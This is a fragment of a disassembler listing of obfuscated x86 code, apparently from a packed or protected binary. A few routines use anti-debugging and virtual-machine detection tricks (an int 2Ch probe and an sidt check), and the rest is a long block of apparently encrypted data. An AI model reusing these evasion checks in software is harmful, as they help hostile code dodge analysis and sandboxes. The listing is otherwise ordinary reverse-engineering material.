; FUNCTION CHUNK AT 0041902F SIZE 00000002 BYTES
test eax, eax
jnz short loc_41904A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short near ptr sub_419031
jmp short loc_419059
; ---------------------------------------------------------------------------
loc_41904A: ; CODE XREF: sub_41903E+2�j
push eax
sidt fword ptr [esp+var_6+4]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short near ptr sub_419031
loc_419059: ; CODE XREF: sub_41903E+A�j
push ebp
call sub_41903B
xchg eax, ecx
call sub_41903B
loc_419065: ; CODE XREF: sub_419031+8�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 167D8h
sub eax, 100h
jnb short loc_41902F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_419016
pop eax
mov ch, 0E3h
xor eax, 32501638h
test [edi-3Bh], dh
lds ecx, [ebx+0CEE996Eh]
assume ds:nothing
sub al, 3
lea edx, [eax+eax*8+63h]
jnz short loc_4190D3
retn 562Dh
; ---------------------------------------------------------------------------
dw 0AED3h
dd 82E112CEh, 0E878BB20h, 0B940005Ch, 0C737D05Eh, 9EE0684Ah
dd 62443156h, 8D65CEDDh, 8B3F7AD1h
db 75h, 73h, 0C0h
; ---------------------------------------------------------------------------
loc_4190D3: ; CODE XREF: sub_41903E+6B�j
imul edi, 78DB2CD0h
setalc
push 0Eh
pushf
mov byte ptr [ebx-50D5668Ch], 0E0h
insd
sbb al, 7Eh
retf
sub_41903E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 0B5B2F217h, 6A7E2F68h, 0F3F0B19Dh, 809E4B7Fh, 0AB56A2D0h
dd 4968F458h, 190CA1F6h, 928234DCh, 88BB4545h, 615CFC8h
dd 0A5AF6153h, 6733C10Ah, 18123E18h, 6347A81h, 6F6CB551h
dd 0B8B96122h, 2176EEF9h, 0CCCA979Dh, 0C4F00F5Ch, 50BA414Ch
dd 0C1082D1Eh, 0C9499692h, 5D35F13Fh, 4EE59896h, 0AC575A2Eh
dd 2F6E380Ah, 5BB424ADh, 653E0A0Bh, 2916660Bh, 0EE2B58DCh
dd 0FAF77450h, 76E0082Eh, 9CC91626h, 264FFAB8h, 149BE7D7h
dd 362889E5h, 0DCDE35B9h, 0E4D41137h, 0A9800743h, 18A5C2D8h
dd 1608B378h, 0FB29C3C5h, 0D3CA1D93h, 563D9496h, 204FFD95h
dd 1E294A75h, 95C179DEh, 0FADBBAC4h, 0DDDAA092h, 0C08C1C39h
dd 8CA67598h, 92BDCFEEh, 0D763BC45h, 0A25F9C81h, 4FC70AFEh
dd 34317EAAh, 0F78DA16Ch, 6EC14C10h, 676AA7B9h, 0FC32A5ABh
dd 145489BAh, 0C3A4F193h, 6398A55Ch, 0FE75F2E9h, 0A45A24EEh
dd 0DB479495h, 0A5AF4972h, 0F1936558h, 8788D868h, 0EF04B73Ah
dd 0D552AFB2h, 0F0AAF59Eh, 0D6818273h, 0B2605A3Eh, 0F29FBECEh
dd 0EE076B9Eh, 0FBDDBB83h, 0BF9B8E7Eh, 8DCF6C1Bh, 511D09AEh
dd 6E69B5D1h, 3647E022h, 0C33BB8A1h, 6926D037h, 10F4DD53h
dd 11E3C1C5h, 8BDC402Eh, 0CC469796h, 0B4AEFB97h, 0FF829B68h
dd 27FFCFAh, 346C3AFAh, 32519EA0h, 0C0D2570Bh, 43237473h
dd 9E6319DCh, 0AAF52B12h, 625DABC5h, 2A53EC16h, 5C2F4C55h
dd 9D96E4EDh, 2DE1D8AFh, 6A80B589h, 3ED11E22h, 403A8520h
dd 4AFBEF99h, 0ED013256h, 4B5FA950h, 202DC22Eh, 60402F15h
dd 0BAADFACFh, 1E14EEECh, 877823D1h, 0BBA9343Ah, 581CD1E6h
dd 0ECA493F4h, 9CAF6F43h, 92BAC062h, 477E8976h, 636C85D4h
dd 23561FA7h, 342E79BAh, 0B13F5E64h, 0AFF4C60h, 6E65ED3Ch
dd 0AB559621h, 0C039B6A5h, 2D2EEF82h, 113A7C62h, 514B0245h
dd 1D24281Dh, 0CC4B9195h, 0B4ACFBC4h, 3184E7ECh, 0F682CAE0h
dd 6863BC38h, 0D64FAC8Ah, 8F9383B7h, 28DE9172h, 8A0ED9DBh
dd 72F23F46h, 52772929h, 0CBB4EE15h, 18A0FFF2h, 2114E2D6h
dd 4CE60C2h, 6D664C48h, 0D4339B2Fh, 0B3B38588h, 0A790C174h
dd 61F64FB9h, 0E3F431C2h, 60DA1707h, 7A680A29h, 0B35407FDh
dd 0C7936E66h, 6D7CC9CEh, 0EDE533DEh, 7AB1262Dh, 713C0439h
dd 0FED66D1Bh, 138CA525h, 0B89B3DA2h, 0B0D5EA8h, 44DB7A14h
dd 239EEC9h, 9B8858E5h, 7704A4Eh, 939A4CFBh, 59657DE0h
dd 3D37C983h, 0DF9ECF0h, 0A40C12D4h, 1EDC59F0h, 6B22C480h
dd 2142E547h, 0B2AA97A8h, 1B79ACEEh, 84110C45h, 0ECE4315Fh
dd 40DF097h, 0EDB8695Ah, 0A96F98Fh, 0CDFD4E9h, 0A3987D86h
dd 0EB59A6CAh, 43C265C7h, 5B2F12B7h, 0C8918AE4h, 56944927h
dd 164B1D5h, 2CA74B1Eh, 0B1A37CD6h, 0FA9EDBC3h, 1F8D101h
dd 776E8145h, 0DF6DA82Ah, 0F141BE82h, 0B1A9FEEEh, 0BFE1B0EFh
dd 937A2A4Ch, 6E6E3006h, 547C8D98h, 2938E2F8h, 252E723Dh
dd 0CF132C8Ah, 1EEF0C6Dh, 5F58A5BFh, 0ACAE615Eh, 427A070Fh
dd 0F5FBA98Ah, 579E2F29h, 0F16DCD5h, 2D9C195Ch, 0B1E5B10h
dd 791863EEh, 5D06637Ch, 1C4ED194h, 4B42DBD6h, 0C240BDBDh
dd 8FDDAA3Ah, 4F1334F5h, 0E8AD4D9Ah, 0FB0A7D34h, 4B989Dh
dd 0D9D14563h, 564D0D1Bh, 0E1ECA4BEh, 0F58B5C25h, 83C25BFEh
dd 4DC03D3Ah, 797F20BDh, 67C688B2h, 30D63EDEh, 79A62CB3h
dd 1C5EE74Bh, 5034B1AFh, 5C9E83EDh, 3C2957C3h, 744503BFh
dd 0F6412328h, 62330571h, 3A58A3ADh, 18207133h, 24FB33F8h
dd 0E9D102D9h, 0AD1DC39Ch, 8A9F5590h, 57DCEC6Dh, 7207978Ah
dd 0B03483Bh, 375E87D3h, 3A956610h, 1E0438EDh, 0E35058E1h
dd 0A11D596h, 5B62AFB6h, 0E02889D2h, 15D904BAh, 8AE9E9DCh
dd 1BE593D4h, 203DBABEh, 8C877577h, 0D0C0DFDFh, 0AE97DF05h
dd 63499DE4h, 0A40C3AC5h, 564A13Bh, 0B94AA7B7h, 464CFD68h
dd 0EF89963Fh, 6084E1FEh, 0DB29BBA6h, 0B56A3A7h, 0EF7299F0h
dd 0B8D77547h, 96A0F62Dh, 103A8A0h, 6762AF4Eh, 0FC91181Ah
dd 6965D04Bh, 0A19D81BAh, 0CE8E5250h, 7F07EAECh, 1884E7ADh
dd 1049E9D8h, 52471CF7h, 839DA29Fh, 7F48D085h, 0B7B07F60h
dd 7B9B0265h, 7C300033h, 0DE97AA4Bh, 8ADC898Ch, 0F2ED1A69h
dd 5B56B307h, 0C3BF0C0Fh, 2C287576h, 9590DDDFh, 2AA1019h
dd 56497625h, 6292B319h, 0CC414105h, 0FC5F0708h, 6C763311h
dd 1700DBF2h, 0B0B46C41h, 304BEFE8h, 0CFC2A7AAh, 67790B2Bh
dd 1278B0BCh, 85935A42h, 234AE3F8h, 0DBC17471h, 631C070Fh
dd 0FDE5B4A1h, 9D847C59h, 1956E2C1h, 0B6DE697Fh, 47413310h
dd 0E4F190BBh, 9B972F37h, 1721AFEEh, 0A8BF797Dh, 555BF3D0h
dd 0DEEF9A8Ch, 6D771152h, 2308CEDAh, 0ADB94E41h, 3057D8E9h
dd 0ABC39590h, 75752F1Dh, 152CA0B3h, 81804B42h, 2B38D498h
dd 0E2D67460h, 77700606h, 0BBF4BDB7h, 91836909h, 363ED0D3h
dd 0B9FA0C78h, 427C011Dh, 0F7F1B8AFh, 8F9C0146h, 10EC6E8h
dd 0BEBF6C56h, 4141E316h, 9EDD9A8Dh, 41713716h, 2308D6D3h
dd 0D8B3594Ah, 74BE9CCh, 0FEC2989Dh, 13753034h, 310CA081h
dd 88944A40h, 2123D1F2h, 0D8D24E65h, 591C280Dh, 0E8C9A5B4h
dd 8A814F5Eh, 3C38C2EAh, 0C0FE6967h, 7A5C1034h, 0F7E4AEA5h
dd 88900228h, 0C16CCC8h, 0CB8A6164h, 6040E439h, 0DBEC8482h
dd 48603E39h, 2E08D7D8h, 0A3B36422h, 3052E9DEh, 0C1D395A3h
dd 77575D1Dh, 91D93B1h, 8D8E475Dh, 382FD096h, 0C6C09AA9h
dd 5B750701h, 0C08391A9h, 80BA4D5Fh, 3D38D7CEh, 0AFD86542h
dd 5D461901h, 0D3E1B3B5h, 8E9D0245h, 70FC7FAh, 8FB96079h
dd 5756F217h, 0E4E98793h, 69681650h, 2E00D8DBh, 0B4BA4E4Eh
dd 2151C78Ah, 0CBCFBF97h, 6B7D3D2Eh, 1A3AC484h, 86897B5Eh
dd 0A2FD9E1h, 0B5D49296h, 707F1727h, 0E2EEA697h, 9F9B5977h
dd 1933CFCBh, 0A5CD450Bh, 4654231Dh, 0E1FDBEBFh, 95851445h
dd 1013C8CEh, 0A28F2425h, 34460C0Ch, 0FEF595B7h, 35702335h
dd 170EF68Bh, 0B2862156h, 297BEEEBh, 0FAA5979Fh, 7B482F39h
dd 0F37A6A9h, 81B65E5Ah, 3F2DE1E3h, 0D0E3FDBEh, 7270201Ch
dd 0EEEE9EB4h, 9D8F4354h, 2C36F3A2h, 0A5D0604Dh, 4C481B27h
dd 0F7E189DCh, 0AFF63320h, 133EC1C3h, 0BCAD7C40h, 5D771831h
dd 0CB99838Bh, 73763D39h, 32BDBD8h, 0D7B04F4Eh, 3455FBDDh
dd 0C5CDB796h, 66435A39h, 0E1FA684h, 918E5F5Dh, 202EE2FFh
dd 0C6CA9B9Ah, 7B730A3Ch, 0F3CECDBFh, 8E8C4479h, 3114FAD6h
dd 8EBB6D67h, 4C563207h, 0C2E9ADBDh, 9F962D37h, 2D5ED8DEh
dd 0AEB55762h, 6455091Fh, 0F8FB8A95h, 7E443D23h, 2C1DF8B9h
dd 0A3B37A50h, 235EDBEFh, 0C7CC9987h, 5F78175Ch, 1222B1A4h
dd 85925D4Bh, 3825F6C5h, 0B5C09496h, 6E581026h, 0EE39A2B4h
dd 0A1E85056h, 3D21D1D6h, 0AFC85765h, 5A501510h, 0F7E0B788h
dd 8EBA412Bh, 0D38DAE2h, 0BFA57645h, 34411317h, 0EFC790A9h
dd 6565393Fh, 1D01E3CDh, 0BBB06B56h, 2F57E2C7h, 0E7A29681h
dd 777E0928h, 220B9B7h, 8EB95D5Dh, 2323FCDFh, 0C1CC978Dh
dd 1E780C01h, 0F529BF9Fh, 0B9824053h, 2D24EFCBh, 0A5F46A6Ah
dd 5050001Eh, 0FEFE85DCh, 999A2E10h, 3039CDC2h, 0A5AC6062h
dd 75412F19h, 0CEFF9089h, 6B963E24h, 3D30B4DFh, 0B7A44E60h
dd 4F4CF2FBh, 0C7CD8DF2h, 7E793228h, 0E17D4A7h, 8CB44B2Dh
dd 3F27F4FBh, 0C0C99EFEh
dd 69660D0Fh, 0E713B3B2h, 9CE65654h, 5739FFC4h, 0DBD66079h
dd 4B4E1D72h, 91FDB3B0h, 9C86510Dh, 163EC6DEh, 0B9AB7D56h
dd 5D4C3218h, 9CF08E82h, 618A2506h, 1903DDC5h, 96BB7967h
dd 5B56EBE7h, 0C3C59992h, 64682209h, 1738BEA6h, 8FA84258h
dd 3A0CE4F1h, 0B3EA9698h, 79600F2Fh, 0F119A7BDh, 83804277h
dd 1722E9F5h, 0CAD94D09h, 424E1F14h, 0F1ED87AEh, 94987827h
dd 251BA7CEh, 80935142h, 76024B4Fh, 0C994ADA9h, 6FBE2D2Bh
dd 2700C1D9h, 86CE627Ah, 4D78E3E2h, 0C3D48295h, 4E701020h
dd 1F15EFC2h, 92BC537Ah, 2523D9EAh, 0CAEF9289h, 7E416024h
dd 0F01E9BA9h, 99885061h, 1435DFFAh, 0B85F8008h, 4E4EA45Bh
dd 6787D4D9h, 0F4D471CFh, 6533A6C0h, 0A2915F42h, 61E7F37Eh
dd 0CEC3346Fh, 50AD0927h, 0F6F14EE6h, 50CD2A32h, 0A9C98F42h
dd 0A5AEC74Ah, 0CD0F90DBh, 0DEEA3196h, 0ECD8153Fh, 482BDE6Dh
dd 2456F891h, 1A22732Dh, 7750748h, 0EBE330A6h, 3418F1CEh
dd 683E0207h, 0E9956B05h, 8EEE93B2h, 9CEF2C41h, 5F32F7ABh
dd 0C7A15A7Ah, 612A1D7Ah, 0C6D8FB0h, 1CB64C1h, 0FF9CE9EBh
dd 0D2FC32D0h, 67417D00h, 0B11D6765h, 1E55367h, 666E2E4Dh
dd 0FD42419h, 95BFDEC6h, 9CD57071h, 969C5E53h, 8279DDF4h
dd 151D7BDDh, 0C2CE1362h, 36B4312Ah, 2406EFE1h, 72C63AD7h
dd 7065C4BFh, 5E678829h, 0DD4C829Ch, 1DC17679h, 136E211Dh
dd 30D6C2CEh, 1DA22AB3h, 48449517h, 0D234819Fh, 5C6316F0h
dd 0CF5A95DDh, 756D52EAh, 5C8B2328h, 76250A7Dh, 226EC7F9h
dd 2830BDE7h, 0D02C94CBh, 0B8B07E65h, 7E4B0263h, 0BE340035h
dd 0EE899649h, 0D184E1FDh, 0A1ED3EFDh, 5D56A34Fh, 283E5110h
dd 2E186FCDh, 21D228Bh, 0FFC95CCAh, 48AFFDE2h, 0D0E1183Fh
dd 5F384500h, 0B85A6C2Bh, 2BC85265h, 6EA53F79h, 0DCF22317h
dd 86628CA5h, 0AFCDF592h, 64EF6E9Eh, 56D3ACEh, 80115AF3h
dd 514A9790h, 0BAE8D08Fh, 9791553Ch, 8BB4CB31h, 0F2E180B5h
dd 0D6DDA3A6h, 0C4BF0D07h, 0E6038D74h, 655B5680h, 0FB8D27EFh
dd 8C974DF6h, 0C00C9BD8h, 6BE00AD5h, 0F5CC2560h, 5854123Eh
dd 0E69245D7h, 0DBE60FBBh, 0CF33480Dh, 9D8BFD62h, 95C77660h
dd 78BFC223h, 0E7092E58h, 9349C013h, 9444956Ah, 0A519695Bh
dd 4AB7D9DCh, 7BF78A7Fh, 6B7A5430h, 4E5DFB0Eh, 0D2821434h
dd 5671A816h, 0FDF9AE1Dh, 0E73FAFB0h, 0FED06EF4h, 0CCA90A81h
dd 239CD9C6h, 90D762Fh, 72D43EB3h, 36572325h, 433F8E85h
dd 0ADA39CA2h, 80EF5D5Fh, 7E48E9E1h, 626CD2BAh, 4F4B93BDh
dd 0B7D95002h, 201C6D82h, 0DDD687D3h, 64126D3Ch, 5A668F81h
dd 5532C53Eh, 2B287471h, 96FA8C8Fh, 94F82C16h, 2562AFAFh
dd 3C5EE74Ah, 0A034B1ABh, 0C4E81F6Ch, 0C6D0602h, 266DBABAh
dd 0F9F297DBh, 0BD3F8C8Eh, 9B8B2D60h, 0D495045Eh, 699BD3B3h
dd 8F35A560h, 191BC598h, 0C326FF57h, 461C5945h, 58F11157h
dd 3D78C56Dh, 0D4569388h, 96ED485Bh, 0A770311Eh, 9391D94Ah
dd 3BCAED46h, 973BBFC4h, 9C9B48BCh, 6564D12Fh, 670916BAh
dd 8605627Ah, 706FB27Eh, 0FCA2DC23h, 88AA7383h, 0F9A7C4D8h
dd 3FD9C8A2h, 0BE25C5F6h, 0DA612E2Bh, 0B4BE29Dh, 0A0CF8D8Bh
dd 7FF6958h, 9784445Ch, 3EEE3A0Ah, 0DC845CF4h, 3F3703CBh
dd 26287573h, 92902D58h, 0C0C7C645h, 0E324BFD8h, 4FC41828h
dd 3434819Fh, 0E8BCD767h, 388414A1h, 2823F3E9h, 185D0157h
dd 0F3ECA4Ch, 0C3F63AD8h, 41460C5Ch, 57B9503Ah, 0D8B82E1Eh
dd 0F3CF9857h, 5CB2FFFFh, 1E1B68D9h, 0D5D3EE50h, 6AE36F73h
dd 5855A207h, 6CB6CD88h, 0AD28794Fh, 928FDC45h, 98D6579h
dd 6C5B9201h, 0CBCA9B93h, 143E2D7Eh, 0A0BBC8C7h, 72613671h
dd 53C0C6CCh, 56A95702h, 281E74F4h, 0D8D38787h, 620C22DDh
dd 0E58EBFFh, 1CA7EB46h, 0F6789996h, 0B5B1D9EFh, 0E148859Fh
dd 0B7AEA644h, 0BF2B0B3Ah, 0B004F1F2h, 0C0BD0A02h, 47511C37h
dd 0F6EFB4B0h, 2B62BB45h, 0E6609D81h, 0F8FF62D6h, 0CFB7F6B7h
dd 0CC9AD7CBh, 6005038h, 393AE93Dh, 241DE72h, 0CD3DBAA6h
dd 99BE8266h, 0DB3D0B5Ch, 29269291h, 76207D7Fh, 4C78B997h
dd 4A94F978h, 2E32ABFDh, 74236D1h, 0DFFF58B7h, 9BAAA1A2h
dd 0C4985580h, 2925729Bh, 7F0C87DCh, 0FAC65E38h, 531C1126h
dd 7E431526h, 34014E35h, 10121DE4h, 6327F17h, 0EAE1124Ah
dd 0D7E31061h, 70031C01h, 2CA7F1C3h, 123D6A6Bh, 0F31DC04Ch
dd 1CDE2B3Dh, 7C6BFD03h, 0E96617FFh, 776E002Ch, 0D7DCA8B2h
dd 869A4F52h, 153EFEC1h, 0B2D4656Eh, 0FB17710Ah, 64DE1657h
dd 1B76109Ch, 601EC1AEh, 0A19543EFh, 8F85F066h, 2498D5FAh
dd 6014E47h, 9124B234h, 0B12DE0DDh, 0D3F0521h, 0A9A3F0F3h
dd 5581F23Ah, 9F466AC1h, 1764C82h, 7FD31E6Dh, 0E1AECBCFh
dd 0E1456202h, 0B7535544h, 0CB9CBE3Ah, 40951DAAh, 45B5C78Eh
dd 292371D6h, 0B2E3D8B6h, 0ACF44144h, 0F6A2A1C7h, 0CBF63FB7h
dd 0BF2322F5h, 1EF4A9h, 6307D67h, 5F533830h, 34501E12h
dd 4FC5778Ah, 0A9C8BCA2h, 0A7F45E36h, 7B43F0F6h, 0CF99BCD1h
dd 0B31592A6h, 859DC94Ah, 0D3839C68h, 0DF7EFBFAh, 0E074F4BFh
dd 5851C926h, 0FB38600Bh, 2556353Eh, 0FF1F288Fh, 13F37069h
dd 635CA8ECh, 0CB0DAC9Bh, 83217B7Eh, 0E91BFDA9h, 1975361h
dd 3967B4B9h, 0FAF188DEh, 686F86B9h, 83487B0Dh, 5281576Bh
dd 0F1B1BCF8h, 31D8507Dh, 0C064E31Eh, 8021E1B4h, 1EB83354h
dd 87054B13h, 9C83605Ch, 0A5AD99D5h, 9615EE53h, 5AAA4A7Eh
dd 628A8FFFh, 0F6EE6DCFh, 6115AC1Bh, 48F09AC6h, 7DA6897Eh
dd 0A3206BEEh, 8FFE7B7Fh, 5AD38881h, 0A7CF2C10h, 98DAE0Bh
dd 9CA0DDC1h, 20396DEFh, 8F2B1C3h, 0D225D8D3h, 9F61954h
dd 3AABC8CDh, 2C2426EBh, 0EF2C99CFh, 0EC8F623Bh, 564E9BC8h
dd 3B485389h, 27107809h, 0BB794025h, 750E3E73h, 616AB2D3h
dd 0C63CE897h, 0CDD342F8h, 0A811681Ah, 69FD7A7Eh, 3A65D8B6h
dd 0B55BE44Fh, 0B637B4ABh, 96AFAB75h, 0DE89459h, 781AED92h
dd 0CCE4B3D4h, 0CCCB8FA3h, 0B29AC7B7h, 1B79B4EEh, 0D449379Ch
dd 0DCD784C8h, 0C0B29AAFh, 0BD862F51h, 162CE9FBh, 8B0ED4E9h
dd 3A65C266h, 0EB599681h, 7D493340h, 311B4830h, 0AE89B46Fh
dd 97D7B7C6h, 6B548182h, 0E38A9795h, 179B83B6h, 5F7C402Dh
dd 1373D1D5h, 263EBCF1h, 8E897579h, 64401B6Dh, 4EF9F6CBh
dd 2A3992F1h, 0F05F04CDh, 8ED91A0Ch, 382EF8F0h, 0FC8F6662h
dd 497B031Ch, 0A0B4E0B4h, 0DA835025h, 0C589484h, 82955D4Bh
dd 45692B37h, 0F7F7AD91h, 6F940B38h, 60CC2C0h, 8EB87C4Eh
dd 4D47E7D6h, 0D7F88987h, 6C6E000Bh, 370ADEB2h, 0ADB2474Ah
dd 2610D1E2h, 0D5C59488h, 6A633B17h, 0F0108090h, 86835850h
dd 3F24C8F1h, 0E7CD626Fh, 4A7C1E3Dh, 0E9F7B3B3h, 93814910h
dd 232C8C1h, 0AEB47850h, 55400416h, 0E8D0BA87h, 63932B3Bh
dd 60BDBD2h, 9D976B72h, 3A40F2EDh, 0F7DAA6BEh, 49571301h
dd 1604F7E3h, 0B2A54C5Ah, 1163F8F6h, 0C0C39A90h, 5B4C2E15h
dd 0E40AB7BEh, 8CB75A5Ah, 3D23E4EEh, 0C2F65C6Bh, 5173051Dh
dd 0D884A3B3h, 918A485Eh, 2E39EBD3h, 0C5BD0C64h, 6A7B2578h
dd 0E5E0DBF1h, 92903E25h, 316C19Ch, 0A0A77669h, 575DAFE2h
dd 0EC9C868Ah, 2B4E111Ch, 9D1CAh, 0AFA14B4Eh, 6CD985h
dd 0E4C0D4AAh, 375E142Eh
dd 0F211B3ECh, 0E2D25B47h, 514A7FCEh, 38EE0004h, 123C8F81h
dd 0E40117D5h, 0F3ED0A2Bh, 707B3659h, 2C7E0C3Fh, 47790168h
dd 772556FEh, 0A7F97662h, 124C931Dh, 0F14A7E30h, 1B419C7Dh
dd 8D6D5466h, 7C8E5264h, 15C8EDBFh, 0D553AE83h, 0CB3FBCA5h
dd 9D8CC072h, 5099A760h, 81364933h, 5E09FC9h, 0AFFF1A55h
dd 0D0B3302Fh, 211C686Fh, 0B3112E82h, 1BED0A11h, 5B56A32Ch
dd 0D6168983h, 46787546h, 6A9EB7DFh, 0CDD50FDDh, 421E2CB0h
dd 0BFBE1C11h, 37348969h, 0E3DABAEAh, 4549167Dh, 6FF845BCh
dd 0D1D61309h, 292BF84Dh, 0C44FA4F4h, 0EAEFA2A6h, 4E531C5Dh
dd 9221AB31h, 0A79A689Bh, 0B7B30009h, 7F5F2F39h, 0CDAA829Ch
dd 0EED7670h, 6A7ABE31h, 3BFEE40Dh, 9EA58A8Ah, 94A0F121h
dd 0FCF8422Fh, 0F09DF9AFh, 0CDFB3439h, 36348C68h, 0CDD8B5E9h
dd 5A40041Bh, 2528E6E8h, 26802367h, 72146519h, 0ABA01CF5h
dd 5C4C5D5Eh, 2E2C9688h, 701E7830h, 4E7ABC71h, 0E7E2C932h
dd 754D6A03h, 8884B9D3h, 0FBB7A3Bh, 697D5236h, 3E478F0Ch
dd 0A7785600h, 0A3BC2248h, 6074CB46h, 0E629F89h, 0D6A34A17h
dd 6434817Fh, 0EB0916B8h, 0F805627Dh, 4046772Fh, 0D8DDCB23h
dd 126A8C8Bh, 9894A6B1h, 5F5C1973h, 3DED3AC6h, 0CE11E03h
dd 4D4A979Dh, 0C7C37377h, 78680701h, 78D4D190h, 0DFC6E3AFh
dd 0BDD32AA2h, 0CFBF3C20h, 7BA5F842h, 1B90EDC5h, 0CAD5B1C0h
dd 0F69DFEADh, 0CBFB3457h, 3430E9EDh, 2811E9E7h, 6354B0Fh
dd 0B2D037E0h, 3FD6130Eh, 0BFC07E76h, 0D223395h, 12106D7Ch
dd 0DDDD4695h, 0E3E11E0Eh, 6C2E021Bh, 0E1E2FFCFh, 1E716902h
dd 8781B883h, 7A13B93Ah, 58658E43h, 0B5E4CB8Eh, 0BEAAF951h
dd 0C08FECFCh, 4F75432Fh, 63518E09h, 9B9A4142h, 0A1CCD22Fh
dd 9DABC402h, 0DB91AE08h, 0A96C8995h, 0E7FBDCA7h, 2ED68B8Ah
dd 56590C01h, 221D21D1h, 37F203C5h, 0B5E01D3Bh, 0A47AC9C2h
dd 4A4E0CA6h, 0B56E2AFh, 0D3D4CFE1h, 0A5030C65h, 9FAB5E50h
dd 0F0A8468Eh, 765E2573h, 60B533E8h, 7F30BBBAh, 6350B8E1h
dd 9FBF7340h, 0B1BFB64Dh, 9DAAD7A8h, 57520101h, 3E3AE9E9h
dd 0FBE1B4DDh, 0D5C28ABAh, 0A995DEDEh, 6711B39Dh, 7B7A2BB1h
dd 0AB8C2C2Eh, 1C09C2DAh, 0F9F4D3B6h, 8BE66624h, 87B1E290h
dd 0EFEA3BD2h, 0B1BF3A2h, 0A1EA7D6Eh, 6840071Fh, 7728ADCh
dd 0FAC6689Ch, 9CEA213Eh, 0A3C8253Ah, 34317EB6h, 62998CB1h
dd 362E56C5h, 0BDFF3AB9h, 5AD3103Dh, 70114E37h, 0FEF6A7F3h
dd 39E8CFA3h, 0BFF6C2F5h, 0C4BA622h, 1C47A489h, 0E3AE96A8h
dd 1E1A0D3Ah, 547F4DD1h, 10132BD2h, 6AEF1C5Dh, 0C0BB381Eh
dd 0A14C7A07h, 6D8CD9CFh, 0CAD92BD0h, 635243ADh, 98901416h
dd 77B3E31h, 0D1DCCBD5h, 93FE4E1Ch, 6F599AF8h, 0D7D577B1h
dd 0F5B6888Ah, 0A993E845h, 0BFB1D405h, 9374F1E9h, 1C22DBA2h
dd 4C469F7Eh, 0FBE7ACFFh, 4A522A21h, 0CB3388FFh, 0AE7DCA3Ah
dd 0DD51AE8Eh, 0F53E08CBh, 0BA237071h, 928BDDB4h, 0E41CC45h
dd 3A5D9AB5h, 0E70FAE9Bh, 61C77C4Eh, 1E681B16h, 362C80EDh
dd 0EB67B5B9h, 0D7D11C32h, 41AA6B0Bh, 0C1F6EFF3h, 120B595Dh
dd 57DE553Ah, 275D291Eh, 4C459306h, 0DF7971AFh, 8BE93168h
dd 874EE71Ch, 9ABEF4BFh, 4BD8F5AFh, 5546060Bh, 2912431Ah
dd 2F093537h, 0FAC360E3h, 0EE75DCADh, 0FBE5B893h, 0A1D12B7Eh
dd 9DA6CF5Eh, 81F08CD5h, 6E67B531h, 5DDC5DAAh, 0B0097989h
dd 98814877h, 0EF8F915Bh, 7B728FEAh, 0E3B12847h, 0DEBB93FFh
dd 0B49CD53Bh, 12EA9AE4h, 867CAA54h, 7B6BA039h, 577FBC03h
dd 0ECEA1560h, 494FB8Dh, 510CD6EBh, 0F8B2BA4Bh, 0DFD6A8ACh
dd 0CAF431D1h, 42C572CCh, 0F46A1D10h, 4FE4BDBh, 0E48098E9h
dd 2A9B3814h, 0E14B41Dh, 751D60F1h, 0A109667Ah, 8F2356C2h
dd 7457D8D3h, 4A73B02Bh, 0A7C3F897h, 4E146166h, 44E9369Ch
dd 60E50214h, 0DB5ABFE4h, 8E874B9Ch, 912F3D71h, 0B4CC5ED0h
dd 0F011FF57h, 735BEDA9h, 83D1125Eh, 1668727Fh, 947561EDh
dd 52F5AA8Fh, 7C41F6BDh, 599E29E0h, 0D1B7B3Ah, 0A68304F0h
dd 212D5559h, 5650C5F4h, 0DAF9080Bh, 6767AAB6h, 0CA8F8FC4h
dd 11604545h, 0CA328784h, 13B33117h, 65667F0Ah, 11728208h
dd 4C1F6C70h, 0DCD084D9h, 0DB31A8BDh, 0EDD2A69Ah, 0C8F21A21h
dd 2AC87811h, 0CB9E298Fh, 2FC4CA5h, 0F4197B5h, 2C9A1A14h
dd 0C1D6613h, 0A95A68EFh, 660CBF08h, 776FBCC9h, 0FF0098A7h
dd 1B168EA2h, 9D686304h, 0DA975F54h, 36F793B3h, 0EBD31CC9h
dd 417E3C1Dh, 31B50237h, 153095E2h, 0E448F8D8h, 0A5B96D41h
dd 73E53056h, 3F420E22h, 0A105097Ah, 2C1F2168h, 1CB64B3h
dd 0C491BD04h, 3AAC0968h, 0C4CA74DFh, 478A988Fh, 0C71DE5Eh
dd 0B9E5512Bh, 635AEA02h, 4770A16Eh, 472F5109h, 0E642E788h
dd 0B2557759h, 855FAF35h, 524BA888h, 8BDC2B72h, 0DB1D6A1Bh
dd 0BDA9BB42h, 0B53BB40h, 5E579486h, 43071C65h, 2F1956DFh
dd 9891DEE2h, 2E04C28Dh, 8062AF83h, 2E34E614h, 3A3043D9h
dd 8D635C60h, 0F3535266h, 4541B72Ah, 222EA028h, 4684089Fh
dd 2A2EF4F9h, 18206D61h, 7E2EC5A1h, 0D9CD73A1h, 5D8A129Ch
dd 0BAB3A481h, 73DC426Dh, 0DC87BB86h, 0F4853B55h, 0B96A3A7h
dd 0EE4E99EFh, 0D6AB7548h, 0A514D21Eh, 76F9464Eh, 5852A837h
dd 0DB46951Bh, 0B434B1B3h, 92ACFA79h, 61570355h, 0E192EABEh
dd 0DCE60F32h, 4AC0740Ch, 0AEA3F47Ch, 0E8103761h, 0B048C27Fh
dd 0F974D133h, 0D24AA7B7h, 3DBCFFFCh, 221C6A85h, 0BB9F545Ch
dd 3ADE3A0Eh, 0C0760A5h, 95BB665Eh, 1D2FC088h, 36FDDD0h
dd 0FEC96DBCh, 0E36D6F34h, 0CFCB1BDFh, 0BDBD48B1h, 0A1ACD9F4h
dd 62540305h, 7362BAA2h, 9E43DC76h, 0C13FBCA2h, 0D323FB37h
dd 9F105D63h, 4F48E64Ch, 0AC6AED32h, 30192FA2h, 6A800003h
dd 0D0EBA868h, 0F0D3023h, 0F2DD0A12h, 0E36AE82Eh, 0C3BF17C2h
dd 0ED2BA745h, 74672C28h, 0CDDEC3C1h, 69A1AF80h, 37CD53AEh
dd 64B9B762h, 0E32BE6F2h, 40D55147h, 71457BD7h, 85ECA2F5h
dd 0BA51E5FAh, 2FEEEA82h, 67115125h, 42334E17h, 0E5F56CBAh
dd 0BC787DBh, 6E44FF4Ah, 0A527A849h, 89B4E1C8h, 0B56663FFh
